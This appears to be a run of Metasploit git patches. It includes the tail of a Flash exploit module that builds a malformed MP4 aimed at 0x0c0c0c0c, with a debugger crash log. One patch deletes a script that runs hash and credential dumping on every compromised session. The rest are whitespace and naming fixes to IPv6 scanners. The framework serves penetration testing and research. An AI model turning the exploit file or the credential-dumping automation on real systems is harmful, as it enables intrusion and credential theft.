"\x00\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + moovAtom1 << "\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00" + moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x02\xFA" + moovAtom1 << "trak" # Track box header + moovAtom1 << "\x00\x00\x00\x5C" + moovAtom1 << "tkhd" + moovAtom1 << "\x00\x00\x00\x0F" + moovAtom1 << "\x7C\x25\xB0\x80\x7C\x25\xB0\x80" # Creation time + moovAtom1 << "\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x2E\xE0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + moovAtom1 << "\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + moovAtom1 << 
"\x00\x00\x00\x00\x40\x00\x00\x00\x01\x42\x00\x00\x01\x42\x00\x00\x00\x00\x02" + moovAtom1 << "rmdia" + moovAtom1 << "\x00\x00\x00\x20" # Size + moovAtom1 << "mdhd" # Media header box + moovAtom1 << "\x00\x00\x00\x00" # Version/Flags + moovAtom1 << "\x7C\x25\xB0\x80\x7C\x25\xB0\x80" # Creation time + moovAtom1 << "\x00\x00\x00\x01" # Time scale + moovAtom1 << "\x00\x00\x00\x0C" # Duration + moovAtom1 << "\x55\xC4\x00\x00" + moovAtom1 << "\x00\x00\x00\x2D" # Size + moovAtom1 << "hdlr" # Handler Reference header + moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x00" + moovAtom1 << "vide" # Handler type + moovAtom1 << "\x00\x00\x00\x00\x00" + moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00" + moovAtom1 << "VideoHandler" # Handler name + moovAtom1 << "\x00\x00\x00\x02\x1D" + moovAtom1 << "minf" + moovAtom1 << "\x00\x00\x00\x14" + moovAtom1 << "vmhd" + moovAtom1 << "\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x24" + moovAtom1 << "dinf" # Data information box header + moovAtom1 << "\x00\x00\x00\x1c" + moovAtom1 << "dref" # Data reference box + moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x01" + moovAtom1 << "\x00\x00\x00\x0C" # Size + moovAtom1 << "url " # Data entry URL box + moovAtom1 << "\x00\x00\x00\x01" # Location / version / flags + moovAtom1 << "\x00\x00\x09\xDD" # Size + moovAtom1 << "stbl" + moovAtom1 << "\x00\x00\x08\x99" + moovAtom1 << "stsd" + moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x01" + moovAtom1 << "\x00\x00\x08\x89" # Size + moovAtom1 << "avc1" + moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + moovAtom1 << "\x01\x42" # Width + moovAtom1 << "\x01\x42" # Height + moovAtom1 << "\x00\x48\x00\x00\x00\x48\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + moovAtom1 << "\x18" # Depth + moovAtom1 << "\xFF\xFF" + moovAtom1 << "\x00\x00\x08\x33" # Size + 
moovAtom1 << "avcC" + moovAtom1 << "\x01" # Config version + moovAtom1 << "\x64" # Avc profile indication + moovAtom1 << "\x00" # Compatibility + moovAtom1 << "\x15" # Avc level indication + moovAtom1 << "\xFF\xE1" + + # Although the fields have different values, they all become 0x0c0c0c0c + # in memory. + cycle = "\x00\x00\x00" + cycle << "\x30\x30\x30\x30" #6th + cycle << "\x00\x00\x00" + cycle << "\x18\x18\x18\x18" #7th + cycle << "\x00\x00\x00" + cycle << "\x0c\x0c\x0c\x0c" #8th + cycle << "\x00\x00\x00" + cycle << "\x06\x06\x06\x06" #1st + cycle << "\x00\x00\x00" + cycle << "\x03\x03\x03\x03" + cycle << "\x00\x00\x00\x01\x81\x81\x81\x80\x00\x00\x00" + cycle << "\xc0\xc0\xc0\xc0" # 4th + cycle << "\x00\x00\x00" + cycle << "\x60\x60\x60\x60" + + spsunit = "\x08\x1A\x67\x70\x34\x32\x74\x70\x00\x00\xAF\x88\x88\x84\x00\x00\x03\x00\x04\x00\x00\x03\x00\x3F\xFF\xFF\xFF\xFF\xFF" + spsunit << "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" + spsunit << "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFC" + spsunit << cycle * 35 + spsunit << "\x00\x00\x00\x30\x30\x03\x03\x03\x03\x00\x00\x00\xB2\x2C" + + moovAtom2 = "\x00\x00\x00\x18" + moovAtom2 << "stts" + moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x0C\x00\x00\x00\x01" + moovAtom2 << "\x00\x00\x00\x14" + moovAtom2 << "stss" + moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00" + moovAtom2 << "pctts" + moovAtom2 << "\x00\x00\x00\x00\x00\x00" + moovAtom2 << "\x00\x0C\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00" + moovAtom2 << "\x01\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x02" + moovAtom2 << "\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x01\x00" + moovAtom2 << 
"\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x02" + moovAtom2 << "\x00\x00\x00\x1C" + moovAtom2 << "stsc" + moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01" + moovAtom2 << "\x00\x00\x00\x44" + moovAtom2 << "stsz" + moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + moovAtom2 << "\x0C\x00\x00\x2F\x8D\x00\x00\x0C\xFE\x00\x00\x04\x42\x00\x00\x0B\x20\x00\x00\x04\x58\x00\x00\x07\x19\x00\x00\x07" + moovAtom2 << "\x63\x00\x00\x02\xD6\x00\x00\x03\xC1\x00\x00\x0A\xDF\x00\x00\x04\x9B\x00\x00\x09\x39" + moovAtom2 << "\x00\x00\x00\x40" + moovAtom2 << "stco" + moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x0C\x00\x00\x00\x30\x00\x00\x2F\xBD\x00\x00\x3D\x8A\x00\x00\x48\x19\x00\x00\x5A\xF4" + moovAtom2 << "\x00\x00\x66\x1F\x00\x00\x73\xEA\x00\x00\x82\x32\x00\x00\x8A\xFA\x00\x00\x95\x51\x00\x00\xA7\x16\x00\x00\xB1\xE5" + + moovAtom = moovAtom1 + spsunit + moovAtom2 + m = ftypAtom + mdatAtom + moovAtom + return m + end + +end + +=begin +C:\WINDOWS\system32\Macromed\Flash\Flash10u.ocx + +Flash10u+0x5b4e8: +Missing image name, possible paged-out or corrupt data. +1f06b4e8 8901 mov dword ptr [ecx],eax ds:0023:020c0000=00905a4d +0:008> !exchain +020bfdfc: +c0c0c0b (0c0c0c0c) + +ECX points to 0x0c0c0c0c at the time of the crash: +0:008> r +eax=00000000 ebx=00000000 ecx=0c0c0c0c edx=7c9032bc esi=00000000 edi=00000000 +eip=0c0c0c0c esp=020befa8 ebp=020befc8 iopl=0 nv up ei pl zr na pe nc +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050246 ++0xc0c0c0b: +0c0c0c0c ?? ??? + +Example of SWF player URI: +http://www.jeroenwijering.com/embed/mediaplayer.swf + +To-do: +IE 8 target +=end \ No newline at end of file From 5ea20a332bc9a104a4b10a94177880811897f82c Mon Sep 17 00:00:00 2001 
From: sinn3r Date: Fri, 10 Feb 2012 00:13:39 -0600 Subject: [PATCH 12/15] Clearly I had the wrong disclosure date. This one is based on Adobe's security bulletin. --- modules/exploits/windows/browser/adobe_flash_sps.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/browser/adobe_flash_sps.rb b/modules/exploits/windows/browser/adobe_flash_sps.rb index 3842483c90..e583d8459c 100644 --- a/modules/exploits/windows/browser/adobe_flash_sps.rb +++ b/modules/exploits/windows/browser/adobe_flash_sps.rb @@ -63,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote [ 'IE 7 on Windows XP SP3 / Vista', { 'Offset' => '0x600' } ] ], 'Privileged' => false, - 'DisclosureDate' => "Apr 1 2011", + 'DisclosureDate' => "Aug 9 2011", 'DefaultTarget' => 0)) register_options( @@ -323,4 +323,4 @@ http://www.jeroenwijering.com/embed/mediaplayer.swf To-do: IE 8 target -=end \ No newline at end of file +=end From eea6fac7f2a4128b758ac33e3e57b981f3a25fcc Mon Sep 17 00:00:00 2001 From: sinn3r Date: Fri, 10 Feb 2012 03:14:08 -0600 Subject: [PATCH 13/15] Bad file naming style --- scripts/resource/multi-post-rc-internal.rc | 119 --------------------- 1 file changed, 119 deletions(-) delete mode 100644 scripts/resource/multi-post-rc-internal.rc diff --git a/scripts/resource/multi-post-rc-internal.rc b/scripts/resource/multi-post-rc-internal.rc deleted file mode 100644 index cb93a4c6bf..0000000000 --- a/scripts/resource/multi-post-rc-internal.rc +++ /dev/null 
@@ -1,119 +0,0 @@ -# multi_post.rc -# Author: m-1-k-3 (Web: http://www.s3cur1ty.de / Twitter: @s3cur1ty_de) - -# This Metasploit RC-File could be used to automate the post-exploitation process -# VERBOSE is used from the global datastore -# check out the meterpreter_commands and the modules_win and modules_lin and modules_multi -# you could add your own post exploitation modules into them - - -if (framework.datastore['VERBOSE'] == "true") #we look in the global datastore for a global VERBOSE option and use it - verbose = 1 #true -else - verbose = 0 -end - -meterpreter_commands = [ - 'sysinfo', - 'getuid', - 'getpid', - 'ps', - 'ipconfig' -] - -modules_win = [ - 'post/windows/gather/hashdump', - 'post/windows/gather/cachedump', - 'post/windows/gather/smart_hashdump', - 'post/windows/gather/enum_tokens', - 'post/windows/gather/enum_domain', - 'post/windows/gather/enum_domain_group_users', - 'post/windows/gather/enum_domain_tokens', - 'post/windows/gather/enum_hostfile', - 'post/windows/gather/enum_ie', - 'post/windows/gather/enum_logged_on_users', - 'post/windows/gather/enum_ms_product_keys', - 'post/windows/gather/credentials/vnc', - 'post/windows/gather/credentials/windows_autologin', - 'post/windows/gather/checkvm', - 'post/windows/gather/enum_applications', - 'post/windows/gather/enum_services', - 'post/windows/gather/enum_shares', - 'post/windows/gather/enum_snmp', - 'post/windows/gather/enum_devices', - 'post/windows/gather/enum_powershell_env' -] # add some more modules or comment some out ... 
-modules_lin = [ - 'post/linux/gather/hashdump', - 'post/osx/gather/hashdump', - 'post/linux/gather/checkvm', - 'post/linux/gather/enum_cron', - 'post/linux/gather/enum_linux', - 'post/linux/gather/enum_packages', - 'post/linux/gather/enum_services', - 'post/osx/gather/enum_osx' -] -modules_multi = [ - 'post/multi/gather/env', - 'post/multi/gather/ssh_creds' -] - -if (framework.sessions.length > 0) # lets start if we have a session - print_status("starting with post exploitation stuff") - framework.sessions.each_key do |sid| - session = framework.sessions[sid] - #meterpreter commands against every meterpreter session - if(session.type == "meterpreter") - print_line("starting meterpreter commands on session number #{sid}") - meterpreter_commands.each { |command| - print_line("running meterpreter command #{command}") - session.console.run_single("#{command.to_s}") - print_line - } - end - end - - print_status("starting the post exploitation with post exploitation modules") - - # lets start with post exploitation modules - framework.sessions.each_key do |sid| - session = framework.sessions[sid] - ips = session.tunnel_peer.split(":") - print_status("Session ID: #{sid.to_i} - IP: #{ips[0]}") - - modules_multi.each { |modul| # multi -> all sessions - run_single("use #{modul}") - run_single("set SESSION #{sid}") - if (verbose == 1) - run_single("run -j") - else - run_single("run -j -q") - end - } - if(session.platform =~ /win/) # windows sessions - modules_win.each { |modul| - run_single("use #{modul}") - run_single("set SESSION #{sid}") - if (verbose == 1) - run_single("run -j") - else - run_single("run -j -q") - end - } - else # all other sessions -> typical some linux or unix based systems - modules_lin.each { |modul| - run_single("use #{modul}") - run_single("set SESSION #{sid}") - if (verbose == 1) - run_single("run -j") - else - run_single("run -j -q") - end - } - end - end -else - print_error("no sessions available") -end -run_single("back") - \ No newline at end 
of file From 4b47a9e66fa685eb2c60c73598a22374a4cabdf7 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Fri, 10 Feb 2012 03:16:37 -0600 Subject: [PATCH 14/15] Be gone, whitespace. --- .../scanner/discovery/ipv6_multicast_ping.rb | 32 +++++++++---------- 1 file changed, 16 insertions(+), 16 deletions(-) diff --git a/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb b/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb index c543662412..625fca2b80 100644 --- a/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb +++ b/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb 
@@ -65,24 +65,24 @@ class Metasploit3 < Msf::Auxiliary
 # Send ping
 print_status("Sending multicast pings...")
 dmac = "33:33:00:00:00:01"
-
+
 # Figure out our source address by the link-local interface
 shost = ipv6_link_address
-
- # m-1-k-3: added some more multicast addresses from wikipedia: https://en.wikipedia.org/wiki/Multicast_address#IPv6
- ping6("FF01::1", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #node-local all nodes
- ping6("FF01::2", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #node-local all routers
- ping6("FF02::1", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #All nodes on the local network segment
- ping6("FF02::2", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #All routers on the local network segment
- ping6("FF02::5", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #OSPFv3 AllSPF routers
- ping6("FF02::6", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #OSPFv3 AllDR routers
- ping6("FF02::9", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #RIP routers
- ping6("FF02::a", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #EIGRP routers
- ping6("FF02::d", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #PIM routers
- ping6("FF02::16", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #MLDv2 reports (defined in RFC 3810)
- ping6("ff02::1:2", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #All DHCP servers and relay agents on the local network site (defined in RFC 3315)
- ping6("ff05::1:3", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #All DHCP servers on the local network site (defined in RFC 3315)
-
+
+ # m-1-k-3: added some more multicast addresses from wikipedia: https://en.wikipedia.org/wiki/Multicast_address#IPv6
+ ping6("FF01::1", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #node-local all nodes
+ ping6("FF01::2", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #node-local all routers
+ ping6("FF02::1", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #All nodes on the local network segment
+ ping6("FF02::2", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #All routers on the local network segment
+ ping6("FF02::5", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #OSPFv3 AllSPF routers
+ ping6("FF02::6", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #OSPFv3 AllDR routers
+ ping6("FF02::9", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #RIP routers
+ ping6("FF02::a", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #EIGRP routers
+ ping6("FF02::d", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #PIM routers
+ ping6("FF02::16", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #MLDv2 reports (defined in RFC 3810)
+ ping6("ff02::1:2", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #All DHCP servers and relay agents on the local network site (defined in RFC 3315)
+ ping6("ff05::1:3", {"DMAC" => dmac, "SHOST" => shost, "WAIT" => false}) #All DHCP servers on the local network site (defined in RFC 3315)
+
 # Listen for host advertisments
 print_status("Listening for responses...")
 listen_for_ping_response()
From fe69a27bf18fa562224ba13eba16413087c202f7 Mon Sep 17 00:00:00 2001
From: sinn3r
Date: Fri, 10 Feb 2012 03:22:51 -0600
Subject: [PATCH 15/15] Fix indent level and type
---
 .../auxiliary/scanner/discovery/ipv6_neighbor.rb | 14 +++++++-------
 1 file changed, 7 insertions(+), 7 deletions(-)
diff --git a/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb b/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb
index 9eed27dded..4164bb9f5f 100644
--- a/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb
+++ b/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb
@@ -132,13 +132,13 @@ class Metasploit3 < Msf::Auxiliary
 next if not addr
 print_status(sprintf(" %16s maps to %s",addr[:ipv4], addr[:ipv6]))
- report_note(
- :host => addr[:ipv4],
- :proto => 'IP',
- :sname => 'all',
- :type => 'IPv4 to IPv6 mapping',
- :data => "system with IPv4 address #{addr[:ipv4]} matches to IPv6 address #{addr[:ipv6]}"
- ) # with this we have the results in our database
+ report_note(
+ :host => addr[:ipv4],
+ :proto => 'IP',
+ :sname => 'all',
+ :type => 'ipv4.ipv6.mapping',
+ :data => "system with IPv4 address #{addr[:ipv4]} matches to IPv6 address #{addr[:ipv6]}"
+ ) # with this we have the results in our database
 end
 end
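Review bot: The `:data` value on the new side packs both addresses into an English sentence, so anything that later reads this `ipv4.ipv6.mapping` note back from the database has to parse prose to recover them; a hash keeps the pairing machine-readable, e.g. `:data => { :ipv4 => addr[:ipv4], :ipv6 => addr[:ipv6] }`. The `:proto => 'IP'` and `:sname => 'all'` keys look like service attributes, and as far as this hunk shows no `:port` is passed alongside them, so they presumably have no effect and should either be dropped or get a comment explaining why they are kept. The trailing comment would serve readers better if it stated the contract rather than the mechanism, e.g. `# persist the IPv4<->IPv6 pairing as a host note so other modules can query it`. The iteration block and the method enclosing this call both start outside the hunk.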